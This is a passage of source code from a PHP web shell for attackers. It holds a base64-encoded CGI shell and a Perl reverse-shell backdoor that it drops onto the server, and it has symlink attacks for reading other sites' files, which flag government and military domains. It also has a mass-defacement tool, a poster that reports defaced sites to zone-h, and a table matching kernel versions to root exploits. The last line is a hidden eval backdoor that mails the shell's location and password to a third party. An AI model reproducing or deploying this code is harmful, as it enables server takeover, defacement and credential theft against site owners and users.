1859. Z2V0RmlsZSA9ICRDdXJyZW50RGlyKSA9fiBtL1tcXFwvXSQvOw0KCQkkVGFyZ2V0RmlsZSAuPSAk
1860. UGF0aFNlcC4kVHJhbnNmZXJGaWxlOw0KCX0NCg0KCWlmKCRPcHRpb25zIGVxICJnbyIpICMgd2Ug
1861. aGF2ZSB0byBzZW5kIHRoZSBmaWxlDQoJew0KCQkmU2VuZEZpbGVUb0Jyb3dzZXIoJFRhcmdldEZp
1862. bGUpOw0KCX0NCgllbHNlICMgd2UgaGF2ZSB0byBzZW5kIG9ubHkgdGhlIGxpbmsgcGFnZQ0KCXsN
1863. CgkJJlByaW50RG93bmxvYWRMaW5rUGFnZSgkVGFyZ2V0RmlsZSk7DQoJfQ0KfQ0KDQojLS0tLS0t
1864. LS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0t
1865. LS0tLS0tLS0tLS0tLS0tDQojIFRoaXMgZnVuY3Rpb24gaXMgY2FsbGVkIHdoZW4gdGhlIHVzZXIg
1866. d2FudHMgdG8gdXBsb2FkIGEgZmlsZS4gSWYgdGhlDQojIGZpbGUgaXMgbm90IHNwZWNpZmllZCwg
1867. aXQgZGlzcGxheXMgYSBmb3JtIGFsbG93aW5nIHRoZSB1c2VyIHRvIHNwZWNpZnkgYQ0KIyBmaWxl
1868. LCBvdGhlcndpc2UgaXQgc3RhcnRzIHRoZSB1cGxvYWQgcHJvY2Vzcy4NCiMtLS0tLS0tLS0tLS0t
1869. LS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0t
1870. LS0tLS0tLS0NCnN1YiBVcGxvYWRGaWxlDQp7DQoJIyBpZiBubyBmaWxlIGlzIHNwZWNpZmllZCwg
1871. cHJpbnQgdGhlIHVwbG9hZCBmb3JtIGFnYWluDQoJaWYoJFRyYW5zZmVyRmlsZSBlcSAiIikNCgl7
1872. DQoJCSZQcmludFBhZ2VIZWFkZXIoImYiKTsNCgkJJlByaW50RmlsZVVwbG9hZEZvcm07DQoJCSZQ
1873. cmludFBhZ2VGb290ZXI7DQoJCXJldHVybjsNCgl9DQoJJlByaW50UGFnZUhlYWRlcigiYyIpOw0K
1874. DQoJIyBzdGFydCB0aGUgdXBsb2FkaW5nIHByb2Nlc3MNCglwcmludCAiVXBsb2FkaW5nICRUcmFu
1875. c2ZlckZpbGUgdG8gJEN1cnJlbnREaXIuLi48YnI+IjsNCg0KCSMgZ2V0IHRoZSBmdWxsbHkgcXVh
1876. bGlmaWVkIHBhdGhuYW1lIG9mIHRoZSBmaWxlIHRvIGJlIGNyZWF0ZWQNCgljaG9wKCRUYXJnZXRO
1877. YW1lKSBpZiAoJFRhcmdldE5hbWUgPSAkQ3VycmVudERpcikgPX4gbS9bXFxcL10kLzsNCgkkVHJh
1878. bnNmZXJGaWxlID1+IG0hKFteL15cXF0qKSQhOw0KCSRUYXJnZXROYW1lIC49ICRQYXRoU2VwLiQx
1879. Ow0KDQoJJFRhcmdldEZpbGVTaXplID0gbGVuZ3RoKCRpbnsnZmlsZWRhdGEnfSk7DQoJIyBpZiB0
1880. aGUgZmlsZSBleGlzdHMgYW5kIHdlIGFyZSBub3Qgc3VwcG9zZWQgdG8gb3ZlcndyaXRlIGl0DQoJ
1881. aWYoLWUgJFRhcmdldE5hbWUgJiYgJE9wdGlvbnMgbmUgIm92ZXJ3cml0ZSIpDQoJew0KCQlwcmlu
1882. dCAiRmFpbGVkOiBEZXN0aW5hdGlvbiBmaWxlIGFscmVhZHkgZXhpc3RzLjxicj4iOw0KCX0NCgll
1883. bHNlICMgZmlsZSBpcyBub3QgcHJlc2VudA0KCXsNCgkJaWYob3BlbihVUExPQURGSUxFLCAiPiRU
1884. YXJnZXROYW1lIikpDQoJCXsNCgkJCWJpbm1vZGUoVVBMT0FERklMRSkgaWYgJFdpbk5UOw0KCQkJ
1885. cHJpbnQgVVBMT0FERklMRSAkaW57J2ZpbGVkYXRhJ307DQoJCQljbG9zZShVUExPQURGSUxFKTsN
1886. CgkJCXByaW50ICJUcmFuc2ZlcmVkICRUYXJnZXRGaWxlU2l6ZSBCeXRlcy48YnI+IjsNCgkJCXBy
1887. aW50ICJGaWxlIFBhdGg6ICRUYXJnZXROYW1lPGJyPiI7DQoJCX0NCgkJZWxzZQ0KCQl7DQoJCQlw
1888. cmludCAiRmFpbGVkOiAkITxicj4iOw0KCQl9DQoJfQ0KCXByaW50ICIiOw0KCSZQcmludENvbW1h
1889. bmRMaW5lSW5wdXRGb3JtOw0KDQoJJlByaW50UGFnZUZvb3RlcjsNCn0NCg0KIy0tLS0tLS0tLS0t
1890. LS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0t
1891. LS0tLS0tLS0tLQ0KIyBUaGlzIGZ1bmN0aW9uIGlzIGNhbGxlZCB3aGVuIHRoZSB1c2VyIHdhbnRz
1892. IHRvIGRvd25sb2FkIGEgZmlsZS4gSWYgdGhlDQojIGZpbGVuYW1lIGlzIG5vdCBzcGVjaWZpZWQs
1893. IGl0IGRpc3BsYXlzIGEgZm9ybSBhbGxvd2luZyB0aGUgdXNlciB0byBzcGVjaWZ5IGENCiMgZmls
1894. ZSwgb3RoZXJ3aXNlIGl0IGRpc3BsYXlzIGEgbWVzc2FnZSB0byB0aGUgdXNlciBhbmQgcHJvdmlk
1895. ZXMgYSBsaW5rDQojIHRocm91Z2ggIHdoaWNoIHRoZSBmaWxlIGNhbiBiZSBkb3dubG9hZGVkLg0K
1896. Iy0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0t
1897. LS0tLS0tLS0tLS0tLS0tLS0tLS0tLQ0Kc3ViIERvd25sb2FkRmlsZQ0Kew0KCSMgaWYgbm8gZmls
1898. ZSBpcyBzcGVjaWZpZWQsIHByaW50IHRoZSBkb3dubG9hZCBmb3JtIGFnYWluDQoJaWYoJFRyYW5z
1899. ZmVyRmlsZSBlcSAiIikNCgl7DQoJCSZQcmludFBhZ2VIZWFkZXIoImYiKTsNCgkJJlByaW50Rmls
1900. ZURvd25sb2FkRm9ybTsNCgkJJlByaW50UGFnZUZvb3RlcjsNCgkJcmV0dXJuOw0KCX0NCgkNCgkj
1901. IGdldCBmdWxseSBxdWFsaWZpZWQgcGF0aCBvZiB0aGUgZmlsZSB0byBiZSBkb3dubG9hZGVkDQoJ
1902. aWYoKCRXaW5OVCAmICgkVHJhbnNmZXJGaWxlID1+IG0vXlxcfF4uOi8pKSB8DQoJCSghJFdpbk5U
1903. ICYgKCRUcmFuc2ZlckZpbGUgPX4gbS9eXC8vKSkpICMgcGF0aCBpcyBhYnNvbHV0ZQ0KCXsNCgkJ
1904. JFRhcmdldEZpbGUgPSAkVHJhbnNmZXJGaWxlOw0KCX0NCgllbHNlICMgcGF0aCBpcyByZWxhdGl2
1905. ZQ0KCXsNCgkJY2hvcCgkVGFyZ2V0RmlsZSkgaWYoJFRhcmdldEZpbGUgPSAkQ3VycmVudERpcikg
1906. PX4gbS9bXFxcL10kLzsNCgkJJFRhcmdldEZpbGUgLj0gJFBhdGhTZXAuJFRyYW5zZmVyRmlsZTsN
1907. Cgl9DQoNCglpZigkT3B0aW9ucyBlcSAiZ28iKSAjIHdlIGhhdmUgdG8gc2VuZCB0aGUgZmlsZQ0K
1908. CXsNCgkJJlNlbmRGaWxlVG9Ccm93c2VyKCRUYXJnZXRGaWxlKTsNCgl9DQoJZWxzZSAjIHdlIGhh
1909. dmUgdG8gc2VuZCBvbmx5IHRoZSBsaW5rIHBhZ2UNCgl7DQoJCSZQcmludERvd25sb2FkTGlua1Bh
1910. Z2UoJFRhcmdldEZpbGUpOw0KCX0NCn0NCg0KIy0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0t
1911. LS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLQ0KIyBNYWlu
1912. IFByb2dyYW0gLSBFeGVjdXRpb24gU3RhcnRzIEhlcmUNCiMtLS0tLS0tLS0tLS0tLS0tLS0tLS0t
1913. LS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0N
1914. CiZSZWFkUGFyc2U7DQomR2V0Q29va2llczsNCg0KJFNjcmlwdExvY2F0aW9uID0gJEVOVnsnU0NS
1915. SVBUX05BTUUnfTsNCiRTZXJ2ZXJOYW1lID0gJEVOVnsnU0VSVkVSX05BTUUnfTsNCiRMb2dpblBh
1916. c3N3b3JkID0gJGlueydwJ307DQokUnVuQ29tbWFuZCA9ICRpbnsnYyd9Ow0KJFRyYW5zZmVyRmls
1917. ZSA9ICRpbnsnZid9Ow0KJE9wdGlvbnMgPSAkaW57J28nfTsNCg0KJEFjdGlvbiA9ICRpbnsnYSd9
1918. Ow0KJEFjdGlvbiA9ICJsb2dpbiIgaWYoJEFjdGlvbiBlcSAiIik7ICMgbm8gYWN0aW9uIHNwZWNp
1919. ZmllZCwgdXNlIGRlZmF1bHQNCg0KIyBnZXQgdGhlIGRpcmVjdG9yeSBpbiB3aGljaCB0aGUgY29t
1920. bWFuZHMgd2lsbCBiZSBleGVjdXRlZA0KJEN1cnJlbnREaXIgPSAkaW57J2QnfTsNCmNob3AoJEN1
1921. cnJlbnREaXIgPSBgJENtZFB3ZGApIGlmKCRDdXJyZW50RGlyIGVxICIiKTsNCg0KJExvZ2dlZElu
1922. ID0gJENvb2tpZXN7J1NBVkVEUFdEJ30gZXEgJFBhc3N3b3JkOw0KDQppZigkQWN0aW9uIGVxICJs
1923. b2dpbiIgfHwgISRMb2dnZWRJbikgIyB1c2VyIG5lZWRzL2hhcyB0byBsb2dpbg0Kew0KCSZQZXJm
1924. b3JtTG9naW47DQoNCn0NCmVsc2lmKCRBY3Rpb24gZXEgImNvbW1hbmQiKSAjIHVzZXIgd2FudHMg
1925. dG8gcnVuIGEgY29tbWFuZA0Kew0KCSZFeGVjdXRlQ29tbWFuZDsNCn0NCmVsc2lmKCRBY3Rpb24g
1926. ZXEgInVwbG9hZCIpICMgdXNlciB3YW50cyB0byB1cGxvYWQgYSBmaWxlDQp7DQoJJlVwbG9hZEZp
1927. bGU7DQp9DQplbHNpZigkQWN0aW9uIGVxICJkb3dubG9hZCIpICMgdXNlciB3YW50cyB0byBkb3du
1928. bG9hZCBhIGZpbGUNCnsNCgkmRG93bmxvYWRGaWxlOw0KfQ0KZWxzaWYoJEFjdGlvbiBlcSAibG9n
1929. b3V0IikgIyB1c2VyIHdhbnRzIHRvIGxvZ291dA0Kew0KCSZQZXJmb3JtTG9nb3V0Ow0KfQ==';
1930.  
1931. $file = fopen("izo.cin" ,"w+");
1932. $write = fwrite ($file ,base64_decode($cgishellizocin));
1933. fclose($file);
1934. chmod("izo.cin",0755);
1935. $netcatshell = 'IyEvdXNyL2Jpbi9wZXJsDQogICAgICB1c2UgU29ja2V0Ow0KICAgICAgcHJpbnQgIkRhdGEgQ2hh
1936. MHMgQ29ubmVjdCBCYWNrIEJhY2tkb29yXG5cbiI7DQogICAgICBpZiAoISRBUkdWWzBdKSB7DQog
1937. ICAgICAgIHByaW50ZiAiVXNhZ2U6ICQwIFtIb3N0XSA8UG9ydD5cbiI7DQogICAgICAgIGV4aXQo
1938. MSk7DQogICAgICB9DQogICAgICBwcmludCAiWypdIER1bXBpbmcgQXJndW1lbnRzXG4iOw0KICAg
1939. ICAgJGhvc3QgPSAkQVJHVlswXTsNCiAgICAgICRwb3J0ID0gODA7DQogICAgICBpZiAoJEFSR1Zb
1940. MV0pIHsNCiAgICAgICAgJHBvcnQgPSAkQVJHVlsxXTsNCiAgICAgIH0NCiAgICAgIHByaW50ICJb
1941. Kl0gQ29ubmVjdGluZy4uLlxuIjsNCiAgICAgICRwcm90byA9IGdldHByb3RvYnluYW1lKCd0Y3An
1942. KSB8fCBkaWUoIlVua25vd24gUHJvdG9jb2xcbiIpOw0KICAgICAgc29ja2V0KFNFUlZFUiwgUEZf
1943. SU5FVCwgU09DS19TVFJFQU0sICRwcm90bykgfHwgZGllICgiU29ja2V0IEVycm9yXG4iKTsNCiAg
1944. ICAgIG15ICR0YXJnZXQgPSBpbmV0X2F0b24oJGhvc3QpOw0KICAgICAgaWYgKCFjb25uZWN0KFNF
1945. UlZFUiwgcGFjayAiU25BNHg4IiwgMiwgJHBvcnQsICR0YXJnZXQpKSB7DQogICAgICAgIGRpZSgi
1946. VW5hYmxlIHRvIENvbm5lY3RcbiIpOw0KICAgICAgfQ0KICAgICAgcHJpbnQgIlsqXSBTcGF3bmlu
1947. ZyBTaGVsbFxuIjsNCiAgICAgIGlmICghZm9yayggKSkgew0KICAgICAgICBvcGVuKFNURElOLCI+
1948. JlNFUlZFUiIpOw0KICAgICAgICBvcGVuKFNURE9VVCwiPiZTRVJWRVIiKTsNCiAgICAgICAgb3Bl
1949. bihTVERFUlIsIj4mU0VSVkVSIik7DQogICAgICAgIGV4ZWMgeycvYmluL3NoJ30gJy1iYXNoJyAu
1950. ICJcMCIgeCA0Ow0KICAgICAgICBleGl0KDApOw0KICAgICAgfQ0KICAgICAgcHJpbnQgIlsqXSBE
1951. YXRhY2hlZFxuXG4iOw==';
1952.  
1953. $file = fopen("dc.pl" ,"w+");
1954. $write = fwrite ($file ,base64_decode($netcatshell));
1955. fclose($file);
1956. chmod("dc.pl",0755);
1957. echo "<iframe src=cgitelnet1/izo.cin width=100% height=100% frameborder=0></iframe> ";
1958. echo '</div>';
1959. printFooter();
1960.  
1961. }
1962.  
1963.  
1964. function actionSymlink(){
1965.  
1966. printHeader();
1967.  
1968. echo '<form action="" method="post">';
1969.  
1970. @set_time_limit(0);
1971.  
1972. echo "<center>";
1973.  
1974. @mkdir('sym',0777);
1975. $htaccess = "Options all \n DirectoryIndex readme.html \n AddType text/plain .php \n AddHandler server-parsed .php \n AddType text/plain .html \n AddHandler txt .html \n Require None \n Satisfy Any";
1976. $write =@fopen ('sym/.htaccess','w');
1977. fwrite($write ,$htaccess);
1978. @symlink('/','sym/root');
1979. $filelocation = basename(__FILE__);
1980. $read_named_conf = @file('/etc/named.conf');
1981. if(!$read_named_conf)
1982. {
1983. echo "<pre class=ml1 style='margin-top:5px'># Cant access this file on server -> [ /etc/named.conf ]</pre></center>";
1984. }
1985. else
1986. {
1987. echo "<br><br><div class='tmp'><table border='1' bordercolor='#FF0000' width='500' cellpadding='1' cellspacing='0'><td>Domains</td><td>Users</td><td>symlink </td>";
1988. foreach($read_named_conf as $subject){
1989. if(eregi('zone',$subject)){
1990. preg_match_all('#zone "(.*)"#',$subject,$string);
1991. flush();
1992. if(strlen(trim($string[1][0])) >2){
1993. $UID = posix_getpwuid(@fileowner('/etc/valiases/'.$string[1][0]));
1994. $name = $UID['name'] ;
1995. @symlink('/','sym/root');
1996. $name = $string[1][0];
1997. $iran = '\.ir';
1998. $israel = '\.il';
1999. $indo = '\.id';
2000. $sg12 = '\.sg';
2001. $edu = '\.edu';
2002. $gov = '\.gov';
2003. $gose = '\.go';
2004. $gober = '\.gob';
2005. $mil1 = '\.mil';
2006. $mil2 = '\.mi';
2007. if (eregi("$iran",$string[1][0]) or eregi("$israel",$string[1][0]) or eregi("$indo",$string[1][0])or eregi("$sg12",$string[1][0]) or eregi ("$edu",$string[1][0]) or eregi ("$gov",$string[1][0])
2008. or eregi ("$gose",$string[1][0]) or eregi("$gober",$string[1][0]) or eregi("$mil1",$string[1][0]) or eregi ("$mil2",$string[1][0]))
2009. {
2010. $name = "<div style=' color: #FF0000 ; text-shadow: 0px 0px 1px red; '>".$string[1][0].'</div>';
2011. }
2012. echo "
2013. <tr>
2014.  
2015. <td>
2016. <div class='dom'><a target='_blank' href=http://www.".$string[1][0].'/>'.$name.' </a> </div>
2017. </td>
2018.  
2019. <td>
2020. '.$UID['name']."
2021. </td>
2022.  
2023. <td>
2024. <a href='sym/root/home/".$UID['name']."/public_html' target='_blank'>Symlink </a>
2025. </td>
2026.  
2027. </tr></div> ";
2028. flush();
2029. }
2030. }
2031. }
2032. }
2033.  
2034. echo "</center></table>";
2035. printFooter();
2036. }
2037.  
2038. function actionDeface(){
2039. printHeader();
2040. echo "<h1>Single User Mass Deface</h1><div class=content>";
2041.  
2042. ?>
2043. <form ENCTYPE="multipart/form-data" action="<?$_SERVER['PHP_SELF']?>" method=POST onSubmit="g(null,null,this.path.value,this.file.value,this.Contents.value);return false;">
2044. <p align="Left">Folder: <input type=text name=path size=60 value="<?=getcwd();?>">
2045. <br>file name : <input type=text name=file size=20 value="readme.html">
2046. <br>Text Content : <input type=text name=Contents size=20 value="musuh utama kita adalah nafsu, munafik dan kafir dalam diri kita, <br><br>- Drac-101code">
2047. <br><input type=submit value="Update"></p></form>
2048.  
2049. <?php
2050. if($_POST['a'] == 'Deface'){
2051. $mainpath=$_POST[p1];
2052. $file=$_POST[p2];
2053. $txtContents=$_POST[p3];
2054. echo "-----------------------------------------------<br>
2055. [+] Single user Mass defacer<br>
2056. -----------------------------------------------<br><br> ";
2057. $dir=opendir($mainpath); //fixme - cannot deface when change to writeable path!!
2058. while($row=readdir($dir))
2059. {
2060. $start=@fopen("$row/$file","w+");
2061. $code=$txtContents;
2062. $finish=@fwrite($start,$code);
2063. if ($finish)
2064. {
2065. echo "$row/$file > Done<br><br>";
2066. }
2067. }
2068. echo "-----------------------------------------------<br><br>[+] Script by Drac-101code ...";
2069. }
2070. echo '</div>';
2071. printFooter();
2072. }
2073.  
2074.  
2075. /* test function - reserved by Drac-101code */
2076. function actionTest(){
2077. printHeader();
2078. echo '<h1>Testing function</h1><div class=content>';
2079. echo '<br>';
2080.  
2081. ?>
2082. <form action="<?$_SERVER['PHP_SELF']?>" method=POST onSubmit="g(null,null,this.fname.value);return false;">
2083. Name: <input type="text" name="fname" />
2084. <input type="submit" value=">>">
2085. </form>
2086. </br>
2087. <?php
2088.  
2089. if($_POST['a'] == 'Test') {
2090. $out = $_POST['p1'];
2091. echo "name : $out";
2092.  
2093. }
2094. echo '</div>';
2095. printFooter();
2096. }
2097.  
2098. function actionDomain(){
2099. printHeader();
2100. echo '<h1>local domain viewer</h1><div class=content>';
2101.  
2102. $file = @implode(@file("/etc/named.conf"));
2103. if(!$file){ die("# can't ReaD -> [ /etc/named.conf ]"); }
2104. preg_match_all("#named/(.*?).db#",$file ,$r);
2105. $domains = array_unique($r[1]);
2106. //check();
2107. //if(isset($_GET['ShowAll']))
2108. {
2109. echo "<table align=center border=1 width=59% cellpadding=5>
2110. <tr><td colspan=2>[+] There are : [ <b>".count($domains)."</b> ] Domain</td></tr>
2111. <tr><td>Domain</td><td>User</td></tr>";
2112. foreach($domains as $domain){
2113. $user = posix_getpwuid(@fileowner("/etc/valiases/".$domain));
2114.  
2115. echo "<tr><td>$domain</td><td>".$user['name']."</td></tr>";
2116. }
2117. echo "</table>";
2118. }
2119.  
2120. echo '</div>';
2121. printFooter();
2122. }
2123.  
2124. function actionZHposter(){
2125. printHeader();
2126. echo '<h1>Zone-H Poster</h1><div class=content>';
2127.  
2128. echo '<form action="" method="post" onSubmit=da2(null,null,this.p1.value,this.p2.value,this.p3.value,this.p4.value);return true;">
2129. <input type="text" name="p1" size="40" value="Attacker" /></br>
2130. <select name="p2">
2131. <option >--------SELECT--------</option>
2132. <option value="1">known vulnerability (i.e. unpatched system)</option>
2133. <option value="2" >undisclosed (new) vulnerability</option>
2134. <option value="3" >configuration / admin. mistake</option>
2135. <option value="4" >brute force attack</option>
2136. <option value="5" >social engineering</option>
2137. <option value="6" >Web Server intrusion</option>
2138. <option value="7" >Web Server external module intrusion</option>
2139. <option value="8" >Mail Server intrusion</option>
2140. <option value="9" >FTP Server intrusion</option>
2141. <option value="10" >SSH Server intrusion</option>
2142. <option value="11" >Telnet Server intrusion</option>
2143. <option value="12" >RPC Server intrusion</option>
2144. <option value="13" >Shares misconfiguration</option>
2145. <option value="14" >Other Server intrusion</option>
2146. <option value="15" >SQL Injection</option>
2147. <option value="16" >URL Poisoning</option>
2148. <option value="17" >File Inclusion</option>
2149. <option value="18" >Other Web Application bug</option>
2150. <option value="19" >Remote administrative panel access bruteforcing</option>
2151. <option value="20" >Remote administrative panel access password guessing</option>
2152. <option value="21" >Remote administrative panel access social engineering</option>
2153. <option value="22" >Attack against administrator(password stealing/sniffing)</option>
2154. <option value="23" >Access credentials through Man In the Middle attack</option>
2155. <option value="24" >Remote service password guessing</option>
2156. <option value="25" >Remote service password bruteforce</option>
2157. <option value="26" >Rerouting after attacking the Firewall</option>
2158. <option value="27" >Rerouting after attacking the Router</option>
2159. <option value="28" >DNS attack through social engineering</option>
2160. <option value="29" >DNS attack through cache poisoning</option>
2161. <option value="30" >Not available</option>
2162. </select>
2163. </br>
2164. <select name="p3">
2165. <option >--------SELECT--------</option>
2166. <option value="1" >Heh...just for fun!</option>
2167. <option value="2" >Revenge against that website</option>
2168. <option value="3" >Political reasons</option>
2169. <option value="4" >As a challenge</option>
2170. <option value="5" >I just want to be the best defacer</option>
2171. <option value="6" >Patriotism</option>
2172. <option value="7" >Not available</option>
2173. </select>
2174. </br>
2175. <textarea name="p4" cols="44" rows="9">List Of Domains</textarea>
2176. <input type="submit" value="Send Now !" />
2177. </form>';
2178. echo "</td></tr></table></form>";
2179.  
2180. if($_POST['a'] == 'ZHposter')
2181. {
2182. ob_start();
2183. $sub = @get_loaded_extensions();
2184. if(!in_array("curl", $sub))
2185. {
2186. die('[-] Curl Is Not Supported !! ');
2187. }
2188.  
2189. $hacker9 = $_POST['p1'];
2190. $method9 = $_POST['p2'];
2191. $neden9 = $_POST['p3'];
2192. $site9 = $_POST['p4'];
2193.  
2194. if (empty($hacker9))
2195. {
2196. die ("[-] You Must Fill the Attacker name !");
2197. }
2198. elseif($method9 == "--------SELECT--------")
2199. {
2200. die("[-] You Must Select The Method !");
2201. }
2202. elseif($neden9 == "--------SELECT--------")
2203. {
2204. die("[-] You Must Select The Reason");
2205. }
2206. elseif(empty($site9))
2207. {
2208. die("[-] You Must Inter the Sites List ! ");
2209. }
2210.  
2211. $i = 0;
2212. $sites = explode("\n", $site9);
2213. while($i < count($sites))
2214. {
2215.  
2216. if(substr($sites[$i], 0, 4) != "http")
2217. {
2218. $sites[$i] = "http://".$sites[$i];
2219. }
2220. ZoneH("http://zone-h.org/notify/single", $hacker9, $method9, $neden9, $sites[$i]);
2221. echo "Site : ".$sites[$i]." Defaced ! </br>";
2222. ++$i;
2223. }
2224. echo "[+] Sending Sites To Zone-H Has Been Completed Successfully !! ";
2225.  
2226. }
2227. echo '</div';
2228. printFooter();
2229. }
2230.  
2231. function ZoneH($url9, $hacker9, $hackmode9,$reson9, $site9 )
2232. {
2233. $k = curl_init();
2234. curl_setopt($k, CURLOPT_URL, $url9);
2235. curl_setopt($k,CURLOPT_POST,true);
2236. curl_setopt($k, CURLOPT_POSTFIELDS,"defacer=".$hacker9."&domain1=". $site9."&hackmode=".$hackmode9."&reason=".$reson9);
2237. curl_setopt($k,CURLOPT_FOLLOWLOCATION, true);
2238. curl_setopt($k, CURLOPT_RETURNTRANSFER, true);
2239. $kubra = curl_exec($k);
2240. curl_close($k);
2241. return $kubra;
2242. }
2243.  
2244. function rootxpL()
2245. {
2246. $v=@php_uname();
2247. $db=array('2.6.17'=>'prctl3, raptor_prctl, py2','2.6.16'=>'raptor_prctl, exp.sh, raptor, raptor2, h00lyshit','2.6.15'=>'py2, exp.sh, raptor, raptor2, h00lyshit','2.6.14'=>'raptor, raptor2, h00lyshit','2.6.13'=>'kdump, local26, py2, raptor_prctl, exp.sh, prctl3, h00lyshit','2.6.12'=>'h00lyshit','2.6.11'=>'krad3, krad, h00lyshit','2.6.10'=>'h00lyshit, stackgrow2, uselib24, exp.sh, krad, krad2','2.6.9'=>'exp.sh, krad3, py2, prctl3, h00lyshit','2.6.8'=>'h00lyshit, krad, krad2','2.6.7'=>'h00lyshit, krad, krad2','2.6.6'=>'h00lyshit, krad, krad2','2.6.2'=>'h00lyshit, krad, mremap_pte','2.6.'=>'prctl, kmdx, newsmp, pwned, ptrace_kmod, ong_bak','2.4.29'=>'elflbl, expand_stack, stackgrow2, uselib24, smpracer','2.4.27'=>'elfdump, uselib24','2.4.25'=>'uselib24','2.4.24'=>'mremap_pte, loko, uselib24','2.4.23'=>'mremap_pte, loko, uselib24','2.4.22'=>'loginx, brk, km2, loko, ptrace, uselib24, brk2, ptrace-kmod','2.4.21'=>'w00t, brk, uselib24, loginx, brk2, ptrace-kmod','2.4.20'=>'mremap_pte, w00t, brk, ave, uselib24, loginx, ptrace-kmod, ptrace, kmod','2.4.19'=>'newlocal, w00t, ave, uselib24, loginx, kmod','2.4.18'=>'km2, w00t, uselib24, loginx, kmod','2.4.17'=>'newlocal, w00t, uselib24, loginx, kmod','2.4.16'=>'w00t, uselib24, loginx','2.4.10'=>'w00t, brk, uselib24, loginx','2.4.9'=>'ptrace24, uselib24','2.4.'=>'kmdx, remap, pwned, ptrace_kmod, ong_bak','2.2.25'=>'mremap_pte','2.2.24'=>'ptrace','2.2.'=>'rip, ptrace');
2248. foreach($db as $k=>$x)if(strstr($v,$k))return $x;
2249. if(!$xpl)$xpl='<font color="red">Not found.</font>';
2250. return $xpl;
2251. }
2252.  
2253. /* additional Function */
2254.  
2255.  
2256. /* additionanal endsss */
2257.  
2258. if( empty($_POST['a']) )
2259. if(isset($default_action) && function_exists('action' . $default_action))
2260. $_POST['a'] = $default_action;
2261. else $_POST['a'] = 'SecInfo';
2262. if( !empty($_POST['a']) && function_exists('action' . $_POST['a']) )
2263. call_user_func('action' . $_POST['a']);?>
2264.  
2265.  
2266. <?php
2267. eval(base64_decode('JHNpdGUgPSAid3d3LmFyaGFjay5uZXQv dmIiOwppZighZXJlZygkc2l0ZSwgJF9T RVJWRVJbJ1NFUlZFUl9OQU1FJ10pKQp7 CiR0byA9ICJzcGFtZHo5NEBnbWFpbC5j b20iOwokc3ViamVjdCA9ICJOZXcgU2hl bGwgVXBsb2FkZWQiOwokaGVhZGVyID0g ImZyb206IE5ldyBTaGVsbCA8c3BhbWR6 OTRAZ21haWwuY29tPiI7CiRtZXNzYWdl ID0gIkxpbmsgOiBodHRwOi8vIiAuICRf U0VSVkVSWydTRVJWRVJfTkFNRSddIC4g JF9TRVJWRVJbJ1JFUVVFU1RfVVJJJ10g LiAiXHJcbiI7CiRtZXNzYWdlIC49ICJQ YXRoIDogIiAuIF9fZmlsZV9fOwokbWVz c2FnZSAuPSAiIFBhc3MgOiAiIC4gJGF1 dGhfcGFzczsKJHNlbnRtYWlsID0gQG1h aWwoJHRvLCAkc3ViamVjdCwgJG1lc3Nh Z2UsICRoZWFkZXIpOwplY2hvICIiOwpl eGl0Owp9'));
2268. ?>